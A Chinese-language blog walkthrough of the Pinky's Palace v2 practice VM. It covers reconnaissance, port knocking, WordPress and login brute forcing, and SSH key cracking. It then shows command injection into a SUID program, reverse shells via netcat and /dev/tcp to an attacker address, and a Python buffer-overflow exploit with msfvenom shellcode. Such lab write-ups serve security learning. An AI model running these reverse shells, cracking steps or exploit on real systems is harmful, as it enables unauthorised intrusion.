PINKY’S PALACE: V2
|
靶机

1821 字
|
1 小时
本文最后更新于346 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com

函数调用栈分析 – 知乎 (zhihu.com)

一、信息收集

根据提示 添加一个域名到 /etc/hosts

echo “192.168.1.150 pinkydb” | sudo tee -a /etc/hosts

sudo nmap -sC -sV -p 80,4655,7654,31337 192.168.1.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 08:44 CST
Nmap scan report for pinkydb (192.168.1.150)
Host is up (0.00036s latency).

PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.4
|_http-title: Pinky's Blog – Just another WordPress site
|_http-server-header: Apache/2.4.25 (Debian)
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite
MAC Address: 00:0C:29:15:EC:FE (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.02 seconds



sudo nmap -sC -sV -p 80,4655,7654,31337 192.168.1.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 08:44 CST
Nmap scan report for pinkydb (192.168.1.150)
Host is up (0.00036s latency).

PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.4
|_http-title: Pinky's Blog – Just another WordPress site
|_http-server-header: Apache/2.4.25 (Debian)
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite
MAC Address: 00:0C:29:15:EC:FE (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.02 seconds




sudo nmap --script=vuln -p 80,4655,7654,31337 192.168.1.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 08:45 CST
Nmap scan report for pinkydb (192.168.1.150)
Host is up (0.00034s latency).

PORT      STATE    SERVICE
80/tcp    open     http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=pinkydb
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://pinkydb:80/
|     Form id: search-form-6640112d97834
|     Form action: http://pinkydb/
|     
|     Path: http://pinkydb:80/wp-login.php
|     Form id: loginform
|     Form action: http://pinkydb/wp-login.php
|     
|     Path: http://pinkydb:80/?cat=1
|     Form id: search-form-6640112f497e1
|     Form action: http://pinkydb/
|     
|     Path: http://pinkydb:80/?m=201803
|     Form id: search-form-6640112fb0bf8
|     Form action: http://pinkydb/
|     
|     Path: http://pinkydb:80/?p=1
|     Form id: commentform
|     Form action: http://pinkydb/wp-comments-post.php
|     
|     Path: http://pinkydb:80/?p=1
|     Form id: search-form-664011307f161
|     Form action: http://pinkydb/
|     
|     Path: http://pinkydb:80/?p=4
|     Form id: commentform
|     Form action: http://pinkydb/wp-comments-post.php
|     
|     Path: http://pinkydb:80/?p=4
|     Form id: search-form-66401130b2e91
|     Form action: http://pinkydb/
|     
|     Path: http://pinkydb:80/wp-login.php?action=lostpassword
|     Form id: lostpasswordform
|_    Form action: http://pinkydb/wp-login.php?action=lostpassword
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: WordPress version: 2 
|   /: WordPress version: 4.9.4
|   /wp-includes/images/rss.png: WordPress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: WordPress version 2.5 found.
|   /wp-includes/images/blank.gif: WordPress version 2.6 found.
|   /wp-includes/js/comment-reply.js: WordPress version 2.7 found.
|   /wp-login.php: WordPress login page.
|   /wp-admin/upgrade.php: WordPress login page.
|_  /readme.html: Interesting, a readme.
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite
MAC Address: 00:0C:29:15:EC:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 51.35 seconds

80端口 有wordpress

4655 未开启

31337 未开启

7654 没有打开

wpscan –url http://pinkydb/ -e u 扫描用户

pinky1337

wpscan –url http://pinkydb/ –api-token xxxxxxxxxxxxxxxx -e vp –plugins-detection aggressive

扫描插件漏洞 没有

[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:13 <========> (7344 / 7344) 100.00% Time: 00:00:13
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

目录扫描

gobuster dir -u http://192.168.1.150 –wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.html,.php

gobuster dir -u  http://192.168.1.150 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.html,.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.150
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 293]
/.php                 (Status: 403) [Size: 292]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.1.150/]
/wp-content           (Status: 301) [Size: 319] [--> http://192.168.1.150/wp-content/]
/wordpress            (Status: 301) [Size: 318] [--> http://192.168.1.150/wordpress/]
/wp-login.php         (Status: 200) [Size: 2239]
/license.txt          (Status: 200) [Size: 19935]
/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.1.150/wp-includes/]
/readme.html          (Status: 200) [Size: 7413]
/secret               (Status: 301) [Size: 315] [--> http://192.168.1.150/secret/]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.1.150/wp-admin/]

访问 http://192.168.1.150/secret/ 发现一个文件 bambam.txt

获得信息

8890
7000
666
pinkydb

三个数字 可能是 knock 端口敲击 的端口

knock 192.168.1.150 8890 7000 666 发现并没有变化

端口的顺序不同 对于效果有影响

使用 脚本对knock 的不同端口组合进行枚举

vim kn.sh
#!/bin/bash
for i in 8890 7000 666
do
    for j in 8890 7000 666
    do
        for k in 8890 7000 666
        do
            if [ $i -ne $j ] && [ $j -ne $k ] && [ $i -ne $k ]; then
                knock 192.168.1.150 $i $j $k;
            fi
        done
    done
done

运行脚本之后发现上面关闭的端口都打开了

sudo nmap -sC -sV -p 80,4655,7654,31337 192.168.1.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 09:06 CST
Nmap scan report for pinkydb (192.168.1.150)
Host is up (0.00063s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-generator: WordPress 4.9.4
|_http-title: Pinky&#039;s Blog &#8211; Just another WordPress site
4655/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey: 
|   2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
|   256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_  256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp  open  http    nginx 1.10.3
|_http-title: Pinkys Database
|_http-server-header: nginx/1.10.3
31337/tcp open  Elite?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck: 
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|   GetRequest: 
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     HTTP/1.0
|   HTTPOptions: 
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS / HTTP/1.0
|   Help: 
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     HELP
|   RTSPRequest: 
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS / RTSP/1.0
|   SIPOptions: 
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS sip:nm SIP/2.0
|     Via: SIP/2.0/TCP nm;branch=foo
|     From: <sip:nm@nm>;tag=root
|     <sip:nm2@nm2>
|     Call-ID: 50000
|     CSeq: 42 OPTIONS
|     Max-Forwards: 70
|     Content-Length: 0
|     Contact: <sip:nm@nm>
|_    Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.94SVN%I=7%D=5/12%Time=6640162D%P=x86_64-pc-linux-gnu%
SF:r(NULL,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x
SF:20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palac
SF:e\.\n=>\x20\0")%r(GetRequest,6B,"\[\+\]\x20Welcome\x20to\x20The\x20Daem
SF:on\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0in
SF:to\x20Pinky's\x20Palace\.\n=>\x20\0GET\x20/\x20HTTP/1\.0\r\n\r\n")%r(SI
SF:POptions,138,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0Thi
SF:s\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Pa
SF:lace\.\n=>\x20\0OPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x
SF:20nm;branch=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2
SF:>\r\nCall-ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070
SF:\r\nContent-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20appli
SF:cation/sdp\r\n\r\n")%r(GenericLines,5D,"\[\+\]\x20Welcome\x20to\x20The\
SF:x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoo
SF:r\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0\r\n\r\n")%r(HTTPOptions,6F,"
SF:\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soo
SF:n\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20
SF:\0OPTIONS\x20/\x20HTTP/1\.0\r\n\r\n")%r(RTSPRequest,6F,"\[\+\]\x20Welco
SF:me\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x
SF:20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0OPTIONS\x20/\
SF:x20RTSP/1\.0\r\n\r\n")%r(RPCCheck,5A,"\[\+\]\x20Welcome\x20to\x20The\x2
SF:0Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\
SF:n\0into\x20Pinky's\x20Palace\.\n=>\x20\0\x80")%r(DNSVersionBindReqTCP,5
SF:9,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20
SF:soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\
SF:x20\0")%r(DNSStatusRequestTCP,59,"\[\+\]\x20Welcome\x20to\x20The\x20Dae
SF:mon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0i
SF:nto\x20Pinky's\x20Palace\.\n=>\x20\0")%r(Help,5F,"\[\+\]\x20Welcome\x20
SF:to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\
SF:x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0HELP\r\n");
MAC Address: 00:0C:29:15:EC:FE (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.20 seconds

4655 ssh服务

31337 网络服务

7654 nginx 网页服务

对nginx 进行目录扫描

gobuster dir -u  http://pinkydb:7654 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.html,.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://pinkydb:7654
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 134]
/login.php            (Status: 200) [Size: 545]
/config.php           (Status: 200) [Size: 0]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

没什么东西

使用和http://192.168.1.150:7654/无法访问

使用 http://pinkydb:7654/login.php访问可以

二、获得立足点

有一个登陆入口

使用sqlmap进行测试 没有成果

sqlmap -u http://pinkydb:7654/login.php --dbms=mysql  --data="user=adm&pass=passw" -dbs  --level=5 --risk=3 --tamper=space2comment

进行爆破 先构造 user文件

/config.php

cat user
pinkydb
pinky
pinky1337

然后构造pass文件

  cewl http://pinkydb/ -w 2
  cewl http://pinkydb:7654 -w 1
  cat 1 | tee -a  2

进行爆破

 hydra -L ./user -P ./2 http-post-form://pinkydb:7654/login.php:"user=^USER^&pass=^PASS^":"Invalid Username or Password\!"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-12 09:31:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 712 login tries (l:4/p:178), ~45 tries per task
[DATA] attacking http-post-form://pinkydb:7654/login.php:user=^USER^&pass=^PASS^:Invalid Username or Password!
[7654][http-post-form] host: pinkydb   login: pinky   password: Passione
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-12 09:31:51

获得一个凭证 在nginx进行登陆

登陆之后发现有一个类似文件包含漏洞的链接 和stefano 的ssh私钥 下载私钥

chmod 600 id_rsa
ssh -i id_rsa stefano@192.168.1.150 -p 4655
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
stefano@192.168.1.150's password:

需要密码 使用 ssh2john 转换为john 可以处理的形式 然后使用john 破解

ssh2john id_rsa >> rr   
 john --wordlist=/usr/share/wordlists/rockyou.txt rr
john --show   rr            #破解过一次的文件 可以使用--show  显示破解的内容                                 
id_rsa:secretz101
1 password hash cracked, 0 left

ssh -i id_rsa stefano@192.168.1.150 -p 4655 登陆成功  shell获得 stefano

三、提权

stefano@Pinkys-Palace:~$ ls
tools
stefano@Pinkys-Palace:~$ cd tools
stefano@Pinkys-Palace:~/tools$ ls
note.txt  qsub
stefano@Pinkys-Palace:~/tools$ cat note.txt
Pinky made me this program so I can easily send messages to him.

stefano@Pinkys-Palace:~/tools$ ls -al
total 28
drwxr-xr-x 2 stefano stefano   4096 Mar 17  2018 .
drwxr-xr-x 4 stefano stefano   4096 May 11 00:17 ..
-rw-r--r-- 1 stefano stefano     65 Mar 16  2018 note.txt
-rwsr----x 1 pinky   www-data 13384 Mar 16  2018 qsub
stefano@Pinkys-Palace:~/tools$ strings qsub
strings: qsub: Permission denied
stefano@Pinkys-Palace:~/tools$

发现有一个 可疑文件 但是没有权限访问 pinky www-data 13384 Mar 16 2018 qsub

www-data 可以访问 可以使用上面那个文件包含漏洞把文件下载下来

curl http://pinkydb:7654/pageegap.php?1337=/home/stefano/tools/qsub -o qsub1

strings qsub                                               
/lib64/ld-linux-x86-64.so.2
libc.so.6
exit
__isoc99_scanf
puts
strlen
send
setresgid
asprintf
getenv
setresuid
system
getegid
geteuid
__cxa_finalize
strcmp
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.7
GLIBC_2.2.5
AWAVA
AUATL
[]A\A]A^A_
/bin/echo %s >> /home/pinky/messages/stefano_msg.txt
%s <Message>
TERM
[+] Input Password: 
Bad hacker! Go away!
[+] Welcome to Question Submit!
[!] Incorrect Password!
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516

我们可以看到 /bin/echo %s >> /home/pinky/messages/stefano_msg.txt

再根据 上面的提示 Pinky made me this program so I can easily send messages to him.

stefano 会向 pinky 写入信息 正是 通过上面的语句

我们 可以通过这个 %s 向这条命令中写入我们构造的字符串

另外一提,suid bit 其实设置的是euid,不是uid。并不是真正意义上的pinky用户,只是程序运行时临时借用pinky权限。

,这里如果拼接bash -p虽然可以保留euid,拿到pinky用户权限,可以cd切换目录但是输入命令会无后续回显。如果拼接反弹shell就正常

./qsub '`nc -nv 192.168.1.138 1234 -e /bin/bash`'
发现需要输入密码
使用 ghidra 反编译一下 发现是getenv()的值
输入  xterm-256color

获得一个shell 登陆pinky

pinky@Pinkys-Palace:/home/pinky$ cat .bash_history
cat .bash_history
ls -al
cd
ls -al
cd /usr/local/bin
ls -al
vim backup.sh 
su demon
pinky@Pinkys-Palace:/home/pinky$ cd /usr/local/bin
cd /usr/local/bin
pinky@Pinkys-Palace:/usr/local/bin$ ls
ls
backup.sh
pinky@Pinkys-Palace:/usr/local/bin$ 

发现一个backup.sh  -rwxrwx---  1 demon pinky   59 May 11 01:31 backup.sh
可以写入  感觉是一个计划任务  写入反弹shell试试

cat: backup.sh: Permission denied 没有权限 非常奇怪

查一下chatgpt

 -rwxrwx---  1 demon pinky   59 May 11 01:31 backup.sh  当我是 pinky 时  cat: backup.sh: Permission denied
为什么?

ChatGPT
在Linux系统中,文件的权限由三个主要部分组成:所有者权限、所属组权限和其他用户权限。在你给出的文件权限中 -rwxrwx--- 1 demon pinky 59 May 11 01:31 backup.sh:

所有者是 demon
所属组是 pinky
其他用户没有任何权限
因此,只有文件的所有者 demon 和所属组 pinky 能够访问这个文件。当你以 pinky 用户身份尝试执行 cat backup.sh 命令时,因为你属于文件所属组 pinky,你应该可以读取这个文件。但是如果你碰到了 "Permission denied" 错误,可能有以下几种情况:

你当前的登录会话可能没有正确的权限或者没有正确地继承所属组权限。你可以尝试重新登录或者重新加载你的用户组信息,然后再尝试读取文件。
文件权限设置可能存在问题,尤其是所属组权限没有设置为可读取。你可以使用 ls -l 命令查看文件权限详细信息,然后使用 chmod 命令更改文件权限。
文件可能已损坏或被其他进程占用,导致无法读取。
你可以尝试以下几种方法来解决这个问题:

确保你当前的登录会话拥有正确的权限或者重新加载用户组信息。
确保文件 backup.sh 的所属组权限中包含可读取权限。
检查文件是否被其他进程占用或者损坏,导致无法读取。
  1. 重新加载用户组信息
    • 如果你对所属组权限的变化不确定,可以尝试重新加载用户组信息。这在一些Linux发行版上可能需要管理员权限。bashCopy codesudo su - # 切换到超级用户 newgrp pinky # 重新加载所属组信息 exit # 退出超级用户
newgrp
cat backup.sh
/bin/bash -c "bash -i >& /dev/tcp/192.168.1.138/5555 0>&1"

echo ‘/bin/bash -c “bash -i >& /dev/tcp/192.168.1.138/5555 0>&1″‘ >backup.sh

nc -lvp 5555

等待反弹shell 的连接

获得一个shell 登陆 demon

demon@Pinkys-Palace:/dev$ find / -writable -type f 2>/dev/null | grep -v /proc | grep -v /home
<-type f 2>/dev/null | grep -v /proc | grep -v /home
/daemon/panel
/var/www/html/apache/wp-config.php
/usr/local/bin/backup.sh
/sys/fs/cgroup/memory/cgroup.event_control
demon@Pinkys-Palace:/dev$

pwn

发现一个文件 /daemon/panel

demon@Pinkys-Palace:/daemon$ strings panel 
/lib64/ld-linux-x86-64.so.2
d.jb
libc.so.6
socket
strcpy
exit
htons
wait
fork
listen
printf
strlen
send
memset
bind
recv
setsockopt
close
accept
__libc_start_main

使用 ghidra 反编译 panel


void main(void)

{
  int dd;
  ssize_t ff;
  undefined ch [4108];
  socklen_t w;
  sockaddr q;
  sockaddr r;
  undefined4 b;
  int t;
  int c;
  undefined4 a;
  __pid_t local_c;
  
  while( true ) {
    local_c = fork();
    if (local_c == 0) break;
    wait((void *)0x0);
  }
  a = 1;
  b = 1;
  c = socket(2,1,0);
  if (c == -1) {
    fatal("[-] Fail in socket");
  }
  dd = setsockopt(c,1,2,&b,4);
  if (dd == -1) {
    fatal("setting sock options");
  }
  r.sa_family = 2;
  r.sa_data._0_2_ = htons(0x7a69);
  r.sa_data[2] = '\0';
  r.sa_data[3] = '\0';
  r.sa_data[4] = '\0';
  r.sa_data[5] = '\0';
  memset(r.sa_data + 6,0,8);
  dd = bind(c,&r,0x10);
  if (dd == -1) {
    fatal("binding to socket");
  }
  dd = listen(c,5);
  if (dd == -1) {
    fatal("listening");
  }
  w = 0x10;
  t = accept(c,&q,&w);
  if (t == -1) {
    fatal("new sock failed");
  }
  send(t,"[+] Welcome to The Daemon [+]\n",0x1f,0);
  send(t,"This is soon to be our backdoor\n",0x21,0);
  send(t,"into Pinky\'s Palace.\n=> ",0x19,0);
  ff = recv(t,ch,0x1000,0);
  a = (undefined4)ff;
  handlecmd(ch,t);
  close(t);
                    /* WARNING: Subroutine does not return */
  exit(0);
}

这段代码是一个简单的服务器程序,监听指定端口,接受客户端连接,并向客户端发送欢迎消息。接受客户端发送的命令,并调用handlecmd函数处理命令

需要注意的是,代码中使用了fork函数创建子进程来处理客户端连接,以实现多客户端并发处理

需要注意的是,代码中使用了fork函数创建子进程来处理客户端连接,以实现多客户端并发处理
void handlecmd(char *hhh,int param_2)

{
  size_t __n;
  char local_78 [112];
  
  strcpy(local_78,hhh);
  __n = strlen(local_78);
  send(param_2,local_78,__n,0);
  return;
}

可以看到 这里存在一个缓冲区溢出的漏洞

fork() 创建了新的子进程,而 GDB 默认只会跟踪一个进程

使用gdb调试的时候,gdb只能跟踪一个进程。可以在fork函数调用之前,通过指令设置gdb调试工具跟踪父进程或子进程。默认情况下gdb是跟踪父进程的。

 (gdb) set follow-fork-mode child
(gdb) set detach-on-fork off
show follow-fork-mode
gdb ./panel
(gdb) show follow-fork-mode
Debugger response to a program call of fork or vfork is "parent".
(gdb) set follow-fork-mode child
(gdb) set detach-on-fork off
(gdb) show follow-fork-mode
Debugger response to a program call of fork or vfork is "child".

先来寻找偏移量 可以看到偏移量 为120

使用 x/80x $rsp 可以查看 从rsp开始的80个六进制数

x/s $rsp 查看从rsp开始的字符

x/s 0x****** 命令用于查看内存中以某个地址开始的字符串

可以看到rbp被八个A覆盖 可以知道 栈的长度是112 从120之后开始覆盖rip

增加四个字节的C 覆盖rip echo “$(python -c ‘print(“A”*120+”B”*4)’)” | nc 127.0.0.1 31337

开始构造 shellcode 119个字节

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.1.138 lport=5555 -f python -b "\x00\x0a\x0d"

寻找 call rsp

objdump -DS panel | less -p .text | grep -i call
 400cfb:       ff d4                   call   *%rsp

A*120+B*4 124

shellcode+nop+rip 119+1+4

编写利用脚本

import sys
import socket
import time

buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\x23\x9b\xf5\x47\xb4"
buf += b"\x21\x13\x93\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buf += b"\xff\xe2\xf4\x49\xb2\xad\xde\xde\x23\x4c\xf9\x22"
buf += b"\xc5\xfa\x42\xfc\xb6\x5b\x2a\x21\x9b\xe0\xf4\x74"
buf += b"\x89\x12\x19\x72\xd3\x7c\xa1\xde\x31\x49\xf9\x09"
buf += b"\xc3\xfa\x42\xde\x22\x4d\xdb\xdc\x55\x9f\x66\xec"
buf += b"\x2e\x16\xe6\xd5\xf1\xce\x1f\x2d\x69\xa8\xbc\x41"
buf += b"\xf2\x9b\x68\xc7\x49\x13\xc0\x6b\x12\x12\x15\xe3"
buf += b"\x69\x9a\x75\x2c\x9e\xf5\x47\xb4\x21\x13\x93"
#0400cfb
rip=b"\xfb\x0c\x40\x00"
f=b'\x90'
buf=buf+f+rip
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('192.168.1.150',31337))
client.send(buf+b'\n')

nc -lvp 5555

获得反弹shell 登陆root

文末附加内容
fork 子程序gdbknockobjdumppwnshell for循环ssh2john命令执行构造缓冲区溢出
暂无评论

发送评论 编辑评论

 
 
 
 
 
 
 
  
  
  
   
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
  
上一篇
下一篇 
  推荐文章
Ginger
 
WEB DEVELOPER: 1
 
Tr0ll2
 
WinterMute
 
hackmyvm-dc03
 
zic02
 
密码保护:PivotAPI
 
hackmyvm-dc02
 
temple of doom
 
Tr003